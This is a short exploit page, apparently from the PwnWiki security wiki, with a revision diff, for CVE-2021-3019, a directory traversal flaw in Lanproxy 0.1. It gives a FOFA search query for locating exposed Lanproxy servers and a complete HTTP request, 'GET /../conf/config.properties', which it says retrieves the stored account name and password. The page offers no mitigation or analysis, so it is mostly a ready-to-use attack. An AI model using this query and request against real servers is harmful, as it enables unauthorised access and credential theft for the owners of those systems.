Difference between revisions of "CVE-2021-3019 Lanproxy 目錄遍歷漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Lanproxy 0.1 </pre> ==FOFA== <pre> header= "Server: LPS-0.1" </pre> <translate> 發送如下請求: </transl...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 13: | Line 13: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
發送如下請求: | 發送如下請求: | ||
</translate> | </translate> | ||
| Line 28: | Line 29: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
成功在配置文件中讀取 賬號密碼。 | 成功在配置文件中讀取 賬號密碼。 | ||
</translate> | </translate> | ||
Latest revision as of 10:27, 23 March 2021
漏洞影響
Lanproxy 0.1
FOFA
header= "Server: LPS-0.1"
發送如下請求:
GET /../conf/config.properties HTTP/1.1 Host: xxx.xxx.xxx.xxx Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Connection: close
成功在配置文件中讀取 賬號密碼。
